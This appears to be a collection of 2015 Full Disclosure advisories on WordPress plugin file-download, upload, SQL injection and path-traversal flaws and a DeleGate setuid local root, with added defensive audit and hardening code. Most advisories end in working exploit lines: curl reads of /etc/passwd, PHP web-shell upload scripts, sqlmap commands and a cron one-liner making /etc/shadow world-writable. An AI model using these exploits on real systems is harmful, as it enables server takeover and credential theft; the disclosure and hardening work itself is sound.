-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh

SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi
CVE-ID: CVE-2015-7556
Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme 
/etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' 
> /etc/cron.hourly/rootme



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
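The Teradata /etc/luminex finding and this DeleGate one are both things a host audit should catch before an attacker does: a world-writable file or directory that root later trusts, and setuid-root binaries (here the four that setup-subin.sh leaves behind) that nobody reviewed. The script below is an added example, not tooling from Teradata or the DeleGate project: audit_tree() walks a directory with lstat() and reports world-writable files, world-writable directories lacking the sticky bit, and setuid/setgid executables; run_demo() builds a constructed tree in a temporary directory that imitates the two layouts so the checks can be exercised offline.

```python
"""Audit a tree for the two misconfigurations above: world-writable files and
directories (without the sticky bit) and setuid/setgid executables.  Added
example, not vendor tooling; run_demo() builds a constructed tree."""
import os
import stat
import tempfile
from typing import Dict, List


def classify(st: os.stat_result) -> List[str]:
    """Findings for one inode from its lstat() result (empty = clean)."""
    mode = st.st_mode
    findings = []
    if stat.S_ISDIR(mode):
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            findings.append("world-writable directory without sticky bit")
    elif stat.S_ISREG(mode):
        if mode & stat.S_IWOTH:
            findings.append("world-writable file")
        if mode & stat.S_ISUID:
            findings.append("setuid-root executable" if st.st_uid == 0
                            else "setuid executable (uid %d)" % st.st_uid)
        if mode & stat.S_ISGID and mode & stat.S_IXGRP:
            findings.append("setgid executable (gid %d)" % st.st_gid)
    return findings


def audit_tree(root: str) -> Dict[str, List[str]]:
    """Walk `root` using lstat() (symlinks are never followed, so a link into
    /etc/shadow is not mistaken for a writable file) and collect findings
    keyed by path relative to `root`."""
    results: Dict[str, List[str]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            try:
                hits = classify(os.lstat(path))
            except OSError:
                continue
            if hits:
                results[os.path.relpath(path, root)] = hits
    return results


def run_demo() -> Dict[str, List[str]]:
    """Constructed tree imitating /etc/luminex and DGROOT/subin."""
    root = tempfile.mkdtemp(prefix="permaudit_")

    def make(rel: str, mode: int, directory: bool = False) -> None:
        path = os.path.join(root, rel)
        if directory:
            os.mkdir(path)
        else:
            open(path, "w").close()
        os.chmod(path, mode)

    make("luminex", 0o777, directory=True)      # drwxrwxrwx
    make("luminex/pkgmgr", 0o777)               # -rwxrwxrwx
    make("luminex/packages.db", 0o666)          # -rw-rw-rw-
    make("luminex/README", 0o644)               # fine
    make("subin", 0o755, directory=True)
    make("subin/dgcpnod", 0o6550)               # -r-sr-s---
    make("subin/dgdate", 0o755)                 # fine
    make("tmp", 0o1777, directory=True)         # sticky bit set: fine
    return audit_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(run_demo().items()):
        print(path, "->", "; ".join(hits))
```

Point audit_tree() at /etc, /opt or a DGROOT/subin directory on a real host; in the demo the setuid finding reads "setuid-root" only when the script itself runs as root, since the constructed file is owned by whoever created it.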


Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

2015-07-17 Thread Larry W. Cashdollar

 On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar lar...@me.com wrote:
 
 Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
 Author: Larry W. Cashdollar, @_larry0
 Date: 2015-07-09
 Download Site: https://wordpress.org/plugins/mailcwp/
 Vendor: CadreWorks Pty Ltd
 Vendor Notified: 2015-07-09 fixed in v1.110

Typo should be v1.100.



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

2015-07-17 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client 
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php doesn't check that the user is authenticated or 
what type of file is being uploaded, so any user can upload a shell to the 
target WordPress server:

  2 $message_id = $_REQUEST["message_id"];
  3 $upload_dir = $_REQUEST["upload_dir"];
.
.
  8 $fileName = $_FILES["file"]["name"];
  9 move_uploaded_file($_FILES["file"]["tmp_name"], 
"$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http 
server root.

CVEID:
OSVDB:
Exploit Code:
<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
$target_url = 
'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>

Advisory: http://www.vapid.dhs.org/advisory.php?v=138

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1

2015-07-13 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images 
uploaded by an administrator.
Vulnerability:
The code in file download.php doesn't check that the requested file comes 
from the uploaded-images directory, and line 8 unlinks the file after it has 
been downloaded.  The script can therefore be used to read any file the web 
server can open and, if file permissions allow, to delete files out of the 
WordPress directory.

  1 <?php
  2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
  3 $file = $_GET['file'];
  4 
  5 header( 'Content-Type: application/zip' );
  6 header( 'Content-Disposition: attachment; filename="' . $file . 
'"' );
  7 readfile( $file );
  8 unlink( $file );
  9 
 10 exit;
 11 }
 12 ?>
CVEID: TBD
Exploit Code:
$ curl 
http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Advisory: http://www.vapid.dhs.org/advisory.php?v=135

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Remote file upload vulnerability SQLi in wordpress plugin wp-powerplaygallery v3.3

2015-07-13 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability & SQLi in wordpress plugin 
wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plug...@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch 
enabled with great features. This gallery is compatible with iPhone and iPad. 
It also allows you to use it as a widget. You can also enable this Powerplay 
Gallery on your wordpress site by placing a code snippet in your template (.php) 
files. It shows a flash gallery for desktops and a touch-enabled version for 
iPad and iPhone.
Vulnerability:
1. Ability to create directories outside of the upload path by using ../:
Lines 56-59 of upload.php:

56 // Create target dir
57 if (!file_exists($targetDir)) {
58 @mkdir($targetDir);
59 }  

2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of upload.php don't verify what types of files are allowed or 
where they should be placed:

138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140 die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed 
to open output stream."}, "id" : "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144 if ($_FILES["file"]["error"] || 
!is_uploaded_file($_FILES["file"]["tmp_name"])) {
145 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": 
"Failed to move uploaded file."}, "id" : "id"}');
146 }
147 
148 // Read binary input stream and append it to temp file
149 if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": 
"Failed to open input stream."}, "id" : "id"}');
151 }
152 } else {
153 if (!$in = @fopen("php://input", "rb")) {
154 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": 
"Failed to open input stream."}, "id" : "id"}');
155 }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159 fwrite($out, $buff);
160 }

3. SQL injection 
Lines 131-135 of upload.php fail to handle user input appropriately, either by 
sanitizing or parameterizing it. Injection points are
any GET/POST to albumid or name.

131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, 
`description`, `price`, `thumb`, `image`, `status`, `order`, 
`creation_date` )
132   VALUES 
(".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST
['name']."',1,'','NULL')";
133 
134   $wpdb->query($query);
135 

CVEID:
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album 
number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 
301 responses:
e.g. $ curl 
http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
-301 exists else 404 doesn't.
shell is 
http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

$target_url = 
'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'foo' , 'name' => 
'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
SQLi PoC:
$ sqlmap -u 
http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php 
--data "albumid=1" --dbms mysql

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777

2015-07-10 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam 
v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to 
run a swim team including registration, volunteer assignments, scheduling, and 
much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't validate the
user-supplied file path, so arbitrary files, including sensitive system files,
can be downloaded. Note that the same unchecked path is also passed to unlink()
on line 60, so a target the web server can write to is deleted after it is
served:


 50 $file = urldecode($args['file']) ;
 51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
 52 
 53 while (!feof($fh))
 54 $txt .= fread($fh, 1024) ;
 55 
 56 //  Clean up the temporary file - permissions
 57 //  may prevent this from succeeding so use the '@'
 58 //  to suppress any messages from PHP.
 59 
 60 @unlink($file) ;
 61 }
 62 
 63 $filename = urldecode($args['filename']) ;
 64 $contenttype = urldecode($args['contenttype']) ;
 65 
 66 // Tell browser to expect a text file of some sort (usually txt or csv)
 67 
 68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
 69 header(sprintf('Content-disposition:  attachment; filename=%s', $filename)) ;
 70 print $txt ;

CVEID:
OSVDB:
Exploit Code:
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"


[FD] SQL Injection in easy2map-photos wordpress plugin v1.09

2015-07-10 Thread Larry W. Cashdollar
Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating 
great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection
because the queries are built with sprintf() rather than parameterized, and the
request values are not sanitized.

48 $wpdb->query(sprintf("UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';", $PolyLines, $mapID));
218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));


238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName']


331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));
Also

In MapPinImageUpload.php and MapPinIconSave.php the directory name is built from
request input, so ../../../../ path traversal sequences let someone create files
outside the intended upload directory:

   if (!file_exists($imagesDirectory)) {
   mkdir($imagesDirectory);
   }

CVEID: CVE-2015-4615 (SQLi), CVE-2015-4617 (path traversal)
OSVDB:
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3



[FD] Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5

2015-07-07 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in wordpress plugin 
wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, 
message content, transaction results and PDF invoices with WYSIWYG editor and 
placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize
user input, so the filename parameter can traverse out of the invoice directory
and sensitive system files can be downloaded.


<?php
require_once("../../../../wp-admin/admin.php");

header('Content-disposition: attachment; filename='.$_GET['filename']);
header('Content-type: application/pdf');
readfile(HAET_INVOICE_PATH.$_GET['filename']);
?>

Because the Content-Disposition filename is the requested path itself, the
downloaded file arrives under a name like -..-..-..-..-..-..-..-..-etc-passwd;
rename it with mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd (the -- stops mv
from reading the leading dash as an option).

CVEID: Requested TBD
OSVDB: TBD

Exploit Code:
• $ curl 
http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd


[FD] Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0

2015-07-07 Thread Larry W. Cashdollar
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mu...@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos 
directly from your WordPress site.
Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict 
access to the local file system allowing sensitive files to be
downloaded:

$file_name = $_GET['file'];

// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
case 'pdf': $mime = 'application/pdf'; break;
case 'zip': $mime = 'application/zip'; break;
case 'jpeg':
case 'jpg': $mime = 'image/jpg'; break;
default: $mime = 'application/force-download';
}
header('Pragma: public');   // required
header('Expires: 0');   // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime 
($file_name)).' GMT');
header('Cache-Control: private',false);
header('Content-Type: '.$mime);
header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($file_name));// provide file 
size
header('Connection: close');
readfile($file_name);   // push it out
exit();

CVEID: Requested, TBD.
OSVDB: TBD.
Exploit Code:
• $ curl 
http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd


[FD] SQL Injection in easy2map wordpress plugin v1.24

2015-07-03 Thread Larry W. Cashdollar
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom  great-looking 
Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent
to the database; this neither sanitizes user input nor properly parameterizes
the query.

 90 $wpdb->query(sprintf("UPDATE $mapsTable
 91 SET PolyLines = '%s'
 92 WHERE ID = '%s';", $PolyLines, $mapID));

.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186 
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s', 
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName']))) 
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));
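The sprintf('%s') queries in easy2map and easy2map-photos and the concatenated INSERT in wp-powerplaygallery above all fail the same way: the request value is pasted into the SQL text. The following is an added example of my own, not code from any of these plugins, showing the map-name UPDATE written with sprintf() next to the same statement through $wpdb->prepare(), plus the authorization the admin-ajax handler needs (the sqlmap PoCs above are run with a cookie, so any logged-in user reaches it). The table name, capability and nonce action are assumptions.

```php
<?php
// Added example (mine, not code from easy2map, easy2map-photos or
// wp-powerplaygallery): the map-name UPDATE written the vulnerable way and
// the hardened way, plus the checks the admin-ajax handler needs.
// Assumes it runs inside WordPress (global $wpdb, admin-ajax hooks).
// The table name, capability and nonce action below are assumptions.

// Vulnerable pattern from the advisories: sprintf() only substitutes text.
// A mapName of  x' OR 1=1 -- x  closes the quote and rewrites the WHERE clause.
function e2m_update_map_name_unsafe( $wpdb, $maps_table, $map_id, $map_name ) {
    return $wpdb->query( sprintf(
        "UPDATE {$maps_table} SET MapName = '%s', IsActive = 1 WHERE ID = %s;",
        $map_name,
        $map_id
    ) );
}

// Hardened form. The placeholders look the same, but $wpdb->prepare() escapes
// each %s value (and adds the quotes itself) and casts %d to an integer, so a
// quote inside $map_name stays data. Table names cannot be placeholders; this
// one is derived from $wpdb->prefix, never from the request.
function e2m_update_map_name_safe( $wpdb, $maps_table, $map_id, $map_name ) {
    $sql = $wpdb->prepare(
        "UPDATE {$maps_table} SET MapName = %s, IsActive = 1 WHERE ID = %d",
        $map_name,
        $map_id
    );
    return $wpdb->query( $sql );
}

// Authorization and a nonce are the other half of the fix: without them any
// logged-in user (or, with a missing capability check, anyone) can hit the action.
function e2m_img_save_map_name_handler() {
    global $wpdb;

    if ( ! current_user_can( 'edit_posts' ) ) {         // assumed capability
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'e2m_save_map', 'nonce' );     // assumed nonce action

    $map_id   = absint( $_POST['mapID'] ?? 0 );
    $map_name = sanitize_text_field( wp_unslash( $_POST['mapName'] ?? '' ) );
    if ( 0 === $map_id || '' === $map_name ) {
        wp_send_json_error( 'missing mapID or mapName', 400 );
    }

    $maps_table = $wpdb->prefix . 'easy2map_maps';      // assumed table name
    $rows = e2m_update_map_name_safe( $wpdb, $maps_table, $map_id, $map_name );
    if ( false === $rows ) {
        wp_send_json_error( 'database error', 500 );
    }
    wp_send_json_success( array( 'updated' => (int) $rows ) );
}
add_action( 'wp_ajax_e2m_img_save_map_name', 'e2m_img_save_map_name_handler' );
```

The two query functions take the same arguments on purpose: the difference is not in the call site but in who does the quoting. sprintf() trusts the caller; $wpdb->prepare() escapes every value and refuses to interpolate anything it was not given as a placeholder argument.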

In MapPinImageSave.php, the map_id parameter isn't sanitized when creating a
directory, allowing ../ to create files outside of the intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }

CVEID: CVE-2015-4614 (SQLi), CVE-2015-4616 (../ bug)
OSVDB:
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3


[FD] Remote file download vulnerability in download-zip-attachments v1.0

2015-06-26 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: 
Download all attachments from the post into a zip file.

Vulnerability:
download.php in download-zip-attachments makes no check that the requested path
stays within the upload directory, and it unlinks the file after serving it:

<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
  define('WP_USE_THEMES', false);
  require('../../../wp-load.php');
  require "create_zip_file.php";
  $uploads = wp_upload_dir(); 
  $tmp_location = $uploads['path']."/".$_REQUEST['File'];
  //echo $tmp_location;
  $zip = new CreateZipFile;
  $zip->forceDownload($tmp_location,false); 
  unlink($tmp_location); 
  exit;
}

CVEID: 2015-4704
OSVDB:
Exploit Code:
• 
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd


[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0

2015-06-26 Thread Larry W. Cashdollar
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete 
WordPress installation. This plugin allows you to rename WordPress database, 
WordPress directory, change every necessary configuration file, easily from one 
page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is
within the intended download directory:

try{
$dbname   = $_GET["dbname"];
$dumpfname = $_GET["dumpfname"];
$backup_folder = $_GET["backup_folder"];
}catch (Exception $e){}

if(empty($backup_folder)){
$backup_folder="backup/";
}
echo $dumpfname;
if (file_exists($dumpfname)) {  
// zip the dump file
$name=$dbname . "_" . date("Y-m-d");
$zipfname = $backup_folder.$name.".zip";
$zip = new ZipArchive();
if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
{
   $zip->addFile($dumpfname,$dumpfname);
   $zip->close();
}   
// read zip file and send it to standard output
if (file_exists($zipfname)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($zipfname).'"');
flush();
readfile($zipfname);
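The five download endpoints above (wp-swimteam, wp-ecommerce-shop-styling, mdc-youtube-downloader, download-zip-attachments and wp-instance-rename) share one defect: the request string is joined to a path, or used as one, and handed to fopen()/readfile() without ever checking where it resolves. The following is an added example of my own, not code from any of these plugins, of a download handler that resolves the path first and serves the file only if it lands inside the WordPress uploads directory. The query parameter name, the 'read' capability and the ajax action name are assumptions.

```php
<?php
// Added example (mine, not code from any of the plugins above): a download
// endpoint that only serves files resolved inside the WordPress uploads
// directory. Assumes it runs inside WordPress; the query parameter name
// "file", the 'read' capability and the action name are assumptions.

/**
 * Resolve $relative against $base_dir. Returns the absolute path of an
 * existing regular file inside the base, or null. realpath() collapses
 * "..", "." and symlinks, so containment is tested on the final path,
 * not on the request string (a "../" filter can be beaten by encoding or
 * by a symlink inside the directory; a realpath prefix check cannot).
 */
function safe_download_path( $base_dir, $relative ) {
    $base = realpath( $base_dir );
    if ( false === $base ) {
        return null;
    }
    // NUL bytes make realpath() throw (PHP 8) or truncate the path (older).
    if ( '' === $relative || false !== strpos( $relative, "\0" ) ) {
        return null;
    }
    $target = realpath( $base . DIRECTORY_SEPARATOR . $relative );
    if ( false === $target || ! is_file( $target ) ) {
        return null;
    }
    // The resolved file must sit strictly below the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ( 0 !== strncmp( $target, $prefix, strlen( $prefix ) ) ) {
        return null;
    }
    return $target;
}

function plugin_download_handler() {
    if ( ! is_user_logged_in() || ! current_user_can( 'read' ) ) {
        status_header( 403 );
        exit( 'forbidden' );
    }
    $uploads   = wp_upload_dir();
    $requested = isset( $_GET['file'] ) ? (string) wp_unslash( $_GET['file'] ) : '';
    $path      = safe_download_path( $uploads['basedir'], $requested );
    if ( null === $path ) {
        status_header( 404 );
        exit( 'not found' );
    }
    // Never let the client pick Content-Type or the download name: both come
    // from the resolved file. The file is not unlinked afterwards.
    $ft = wp_check_filetype( $path );
    header( 'Content-Type: ' . ( $ft['type'] ? $ft['type'] : 'application/octet-stream' ) );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    header( 'X-Content-Type-Options: nosniff' );
    readfile( $path );
    exit;
}
add_action( 'wp_ajax_plugin_download', 'plugin_download_handler' );   // assumed action name
```

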